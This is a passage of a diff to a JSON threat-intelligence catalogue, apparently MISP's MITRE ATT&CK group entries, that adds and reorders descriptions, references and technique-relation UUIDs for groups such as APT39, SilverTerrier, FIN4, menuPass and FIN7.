"20138b9d-1aac-4a26-8654-a36b6bbf2bba", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "51dea151-0898-4a45-967c-3ebee0420484", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "970cdb5c-02fb-4c38-b17e-d6327cf3c810", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b9f5dbe2-4c55-4fc5-af2e-d42c1d182ec4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e3a12395-188d-4051-9a16-ea8e14d07b88", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "54a649ff-439a-41a4-9856-8d144a2551ba", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "c16e5409-ee53-4d79-afdc-4099dc9292df", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "8c32eb4d-805f-4fc5-bf60-c4d476c131b5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "6ff403bc-93e3-48be-8687-e102fdba8c88", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "ecc2f65a-b452-4eaf-9689-7e181f17f7a5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + } + ], + "uuid": "44e43fad-ffcb-4210-abcf-eaaed9735f80", + "value": "APT39 - G0087" + }, + { + "description": "[SilverTerrier](https://attack.mitre.org/groups/G0083) is a Nigerian threat group that has been seen active since 2014. [SilverTerrier](https://attack.mitre.org/groups/G0083) mainly targets organizations in high technology, higher education, and manufacturing.(Citation: Unit42 SilverTerrier 2018)(Citation: Unit42 SilverTerrier 2016)", + "meta": { + "external_id": "G0083", + "refs": [ + "https://attack.mitre.org/groups/G0083", + "https://www.paloaltonetworks.com/apps/pan/public/downloadResource?pagePath=/content/pan/en_US/resources/whitepapers/unit42-silverterrier-rise-of-nigerian-business-email-compromise", + "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/silverterrier-next-evolution-in-nigerian-cybercrime.pdf" + ], + "synonyms": [ + "SilverTerrier" + ] + }, + "related": [ + { + "dest-uuid": "2a70812b-f1ef-44db-8578-a496a227aef2", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b4d80f8b-d2b9-4448-8844-4bef777ed676", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "53ab35c2-d00e-491a-8753-41d35ae7e547", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e7a5229f-05eb-440e-b982-9a6d2b2b87c8", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + } + ], + "uuid": "76565741-3452-4069-ab08-80c0ea95bbeb", + "value": "SilverTerrier - G0083" + }, { "description": "[Suckfly](https://attack.mitre.org/groups/G0039) is a China-based threat group that has been active since at least 2014. (Citation: Symantec Suckfly March 2016)", "meta": { @@ -8957,13 +10846,6 @@ ], "type": "uses" }, - { - "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "9e9b9415-a7df-406b-b14d-92bfe6809fbe", "tags": [ @@ -8971,26 +10853,129 @@ ], "type": "uses" }, - { - "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "5cbe0d3b-6fb1-471f-b591-4b192915116d", "value": "Suckfly - G0039" }, { - "description": "[menuPass](https://attack.mitre.org/groups/G0045) is a threat group that appears to originate from China and has been active since approximately 2009. The group has targeted healthcare, defense, aerospace, and government sectors, and has targeted Japanese victims since at least 2014. In 2016 and 2017, the group targeted managed IT service providers, manufacturing and mining companies, and a university. (Citation: Palo Alto menuPass Feb 2017) (Citation: Crowdstrike CrowdCast Oct 2013) (Citation: FireEye Poison Ivy) (Citation: PWC Cloud Hopper April 2017) (Citation: FireEye APT10 April 2017)", + "description": "[FIN4](https://attack.mitre.org/groups/G0085) is a financially-motivated threat group that has targeted confidential information related to the public financial market, particularly regarding healthcare and pharmaceutical companies, since at least 2013.(Citation: FireEye Hacking FIN4 Dec 2014)(Citation: FireEye FIN4 Stealing Insider NOV 2014) [FIN4](https://attack.mitre.org/groups/G0085) is unique in that they do not infect victims with typical persistent malware, but rather they focus on capturing credentials authorized to access email and other non-public correspondence.(Citation: FireEye Hacking FIN4 Dec 2014)(Citation: FireEye Hacking FIN4 Video Dec 2014)", + "meta": { + "external_id": "G0085", + "refs": [ + "https://attack.mitre.org/groups/G0085", + "https://www.fireeye.com/current-threats/threat-intelligence-reports/rpt-fin4.html", + "https://www.fireeye.com/blog/threat-research/2014/11/fin4_stealing_insid.html", + "https://www2.fireeye.com/WBNR-14Q4NAMFIN4.html" + ], + "synonyms": [ + "FIN4" + ] + }, + "related": [ + { + "dest-uuid": "8c32eb4d-805f-4fc5-bf60-c4d476c131b5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "91ce1ede-107f-4d8b-bf4c-735e8789c94b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7d751199-05fa-4a72-920f-85df4506c76c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "1608f3e1-598a-42f4-a01a-2e252e81728f", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "6aac77c4-eaf2-4366-8c13-ce50ab951f38", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "20138b9d-1aac-4a26-8654-a36b6bbf2bba", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0bf78622-e8d2-41da-a857-731472d61a92", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + } + ], + "uuid": "d0b3393b-3bec-4ba3-bda9-199d30db47b6", + "value": "FIN4 - G0085" + }, + { + "description": "[menuPass](https://attack.mitre.org/groups/G0045) is a threat group that appears to originate from China and has been active since approximately 2009. The group has targeted healthcare, defense, aerospace, and government sectors, and has targeted Japanese victims since at least 2014. In 2016 and 2017, the group targeted managed IT service providers, manufacturing and mining companies, and a university. (Citation: Palo Alto menuPass Feb 2017) (Citation: Crowdstrike CrowdCast Oct 2013) (Citation: FireEye Poison Ivy) (Citation: PWC Cloud Hopper April 2017) (Citation: FireEye APT10 April 2017) (Citation: DOJ APT10 Dec 2018)", "meta": { "external_id": "G0045", "refs": [ @@ -9000,6 +10985,7 @@ "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-poison-ivy.pdf", "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf", "https://www.fireeye.com/blog/threat-research/2017/04/apt10_menupass_grou.html", + "https://www.justice.gov/opa/press-release/file/1121706/download", "https://www.accenture.com/t20180423T055005Z_w_/se-en/_acnmedia/PDF-76/Accenture-Hogfish-Threat-Analysis.pdf" ], "synonyms": [ @@ -9034,63 +11020,7 @@ "type": "uses" }, { - "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "46944654-fcc1-4f63-9dad-628102376586", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7dd95ff6-712e-4056-9626-312ea4ab4c5e", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "6aac77c4-eaf2-4366-8c13-ce50ab951f38", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "afc079f3-c0ea-4096-b75d-3f05338b7f60", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "b77b563c-34bb-4fb8-86a3-3694338f7b47", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "0a68f1f1-da74-4d28-8d9a-696c082706cc", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", + "dest-uuid": "03342581-f790-4f03-ba41-e82e67392e23", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -9103,6 +11033,13 @@ ], "type": "uses" }, + { + "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "ae676644-d2d2-41b7-af7e-9bed1b55898c", "tags": [ @@ -9111,63 +11048,14 @@ "type": "uses" }, { - "dest-uuid": "8c32eb4d-805f-4fc5-bf60-c4d476c131b5", + "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "1c338d0f-a65e-4073-a5c1-c06878849f21", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "9de2308e-7bed-43a3-8e58-f194b3586700", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "03342581-f790-4f03-ba41-e82e67392e23", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "fb4e3792-e915-4fdd-a9cd-92dfa2ace7aa", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "e3a12395-188d-4051-9a16-ea8e14d07b88", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "54a649ff-439a-41a4-9856-8d144a2551ba", + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -9181,42 +11069,14 @@ "type": "uses" }, { - "dest-uuid": "b42378e0-f147-496f-992a-26a49705395b", + "dest-uuid": "7e150503-88e7-4861-866b-ff1ac82c4475", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "2f1a9fd0-3b7c-4d77-a358-78db13adbe78", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "bba595da-b73a-4354-aa6c-224d4de7cb4e", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "e358d692-23c0-4a31-9eb6-ecc13a8d7735", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "b9f5dbe2-4c55-4fc5-af2e-d42c1d182ec4", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "51dea151-0898-4a45-967c-3ebee0420484", + "dest-uuid": "8c32eb4d-805f-4fc5-bf60-c4d476c131b5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -9230,42 +11090,7 @@ "type": "uses" }, { - "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "64fa0de0-6240-41f4-8638-f4ca7ed528fd", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "17b40f60-729f-4fe8-8aea-cc9ee44a95d5", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "3240cbe4-c550-443b-aa76-cc2a7058b870", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "b2001907-166b-4d71-bb3c-9d26c871de09", + "dest-uuid": "13cd9151-83b7-410d-9f98-25d0f0d1d80d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -9279,14 +11104,126 @@ "type": "uses" }, { - "dest-uuid": "7e150503-88e7-4861-866b-ff1ac82c4475", + "dest-uuid": "9fa07bef-9c81-421e-a8e5-ad4366c5a925", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "9fa07bef-9c81-421e-a8e5-ad4366c5a925", + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b42378e0-f147-496f-992a-26a49705395b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "afc079f3-c0ea-4096-b75d-3f05338b7f60", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "46944654-fcc1-4f63-9dad-628102376586", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "1c338d0f-a65e-4073-a5c1-c06878849f21", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0a68f1f1-da74-4d28-8d9a-696c082706cc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "9de2308e-7bed-43a3-8e58-f194b3586700", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3240cbe4-c550-443b-aa76-cc2a7058b870", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "fb4e3792-e915-4fdd-a9cd-92dfa2ace7aa", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "6aac77c4-eaf2-4366-8c13-ce50ab951f38", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b77b563c-34bb-4fb8-86a3-3694338f7b47", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7dd95ff6-712e-4056-9626-312ea4ab4c5e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "bba595da-b73a-4354-aa6c-224d4de7cb4e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "51dea151-0898-4a45-967c-3ebee0420484", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b2001907-166b-4d71-bb3c-9d26c871de09", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e358d692-23c0-4a31-9eb6-ecc13a8d7735", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -9299,6 +11236,27 @@ ], "type": "uses" }, + { + "dest-uuid": "64fa0de0-6240-41f4-8638-f4ca7ed528fd", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "26c87906-d750-42c5-946c-d4162c73fc7b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "dc5d1a33-62aa-4a0c-aa8c-589b87beb11e", "tags": [ @@ -9306,6 +11264,13 @@ ], "type": "uses" }, + { + "dest-uuid": "54a649ff-439a-41a4-9856-8d144a2551ba", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "ff6caf67-ea1f-4895-b80e-4bb0fc31c6db", "tags": [ @@ -9314,7 +11279,70 @@ "type": "uses" }, { - "dest-uuid": "13cd9151-83b7-410d-9f98-25d0f0d1d80d", + "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "17b40f60-729f-4fe8-8aea-cc9ee44a95d5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b9f5dbe2-4c55-4fc5-af2e-d42c1d182ec4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e3a12395-188d-4051-9a16-ea8e14d07b88", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "2f1a9fd0-3b7c-4d77-a358-78db13adbe78", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "d54416bd-0803-41ca-870a-ce1af7c05638", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "da04ac30-27da-4959-a67d-450ce47d9470", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -9351,6 +11379,55 @@ ], "type": "uses" }, + { + "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b9f5dbe2-4c55-4fc5-af2e-d42c1d182ec4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3489cfc5-640f-4bb3-a103-9137b97de79f", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "96566860-9f11-4b6f-964d-1c924e4f24a4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "196f1f32-e0c2-4d46-99cd-234d4b6befe1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "ae676644-d2d2-41b7-af7e-9bed1b55898c", "tags": [ @@ -9365,61 +11442,12 @@ ], "type": "uses" }, - { - "dest-uuid": "b9f5dbe2-4c55-4fc5-af2e-d42c1d182ec4", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "3489cfc5-640f-4bb3-a103-9137b97de79f", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "196f1f32-e0c2-4d46-99cd-234d4b6befe1", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" - }, - { - "dest-uuid": "96566860-9f11-4b6f-964d-1c924e4f24a4", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" } ], "uuid": "d1acfbb3-647b-4723-9154-800ec119006e", @@ -9433,10 +11461,10 @@ "https://attack.mitre.org/groups/G0046", "https://www.fireeye.com/blog/threat-research/2017/03/fin7_spear_phishing.html", "https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html", - "http://blog.morphisec.com/fin7-attacks-restaurant-industry", - "https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html", "https://www.fireeye.com/blog/threat-research/2017/06/behind-the-carbanak-backdoor.html", - "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html" + "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html", + "http://blog.morphisec.com/fin7-attacks-restaurant-industry", + "https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html" ], "synonyms": [ "FIN7" @@ -9465,7 +11493,7 @@ "type": "uses" }, { - "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", + "dest-uuid": "6faf650d-bf31-4eb4-802d-1000cf38efaf", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -9479,7 +11507,7 @@ "type": "uses" }, { - "dest-uuid": "8c32eb4d-805f-4fc5-bf60-c4d476c131b5", + "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -9493,7 +11521,14 @@ "type": "uses" }, { - "dest-uuid": "0ced8926-914e-4c78-bc93-356fb90dbd1f", + "dest-uuid": "7c93aa74-4bc0-4a9e-90ea-f25f86301566", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "8c32eb4d-805f-4fc5-bf60-c4d476c131b5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -9506,27 +11541,6 @@ ], "type": "uses" }, - { - "dest-uuid": "7c93aa74-4bc0-4a9e-90ea-f25f86301566", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "6faf650d-bf31-4eb4-802d-1000cf38efaf", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", "tags": [ @@ -9534,6 +11548,13 @@ ], "type": "uses" }, + { + "dest-uuid": "edbe24e9-aec4-4994-ac75-6a6bc7f1ddd0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "a127c32c-cbb0-4f9d-be07-881a792408ec", "tags": [ @@ -9549,7 +11570,21 @@ "type": "uses" }, { - "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", + "dest-uuid": "830c9528-df21-472c-8c14-a036bf17d665", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "6aac77c4-eaf2-4366-8c13-ce50ab951f38", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "478aa214-2ca7-4ec0-9978-18798e514790", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -9570,49 +11605,21 @@ "type": "uses" }, { - "dest-uuid": "edbe24e9-aec4-4994-ac75-6a6bc7f1ddd0", + "dest-uuid": "72f54d66-675d-4587-9bd3-4ed09f9522e4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "478aa214-2ca7-4ec0-9978-18798e514790", + "dest-uuid": "0ced8926-914e-4c78-bc93-356fb90dbd1f", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "830c9528-df21-472c-8c14-a036bf17d665", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "4f6aa78c-c3d4-4883-9840-96ca2f5d6d47", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - 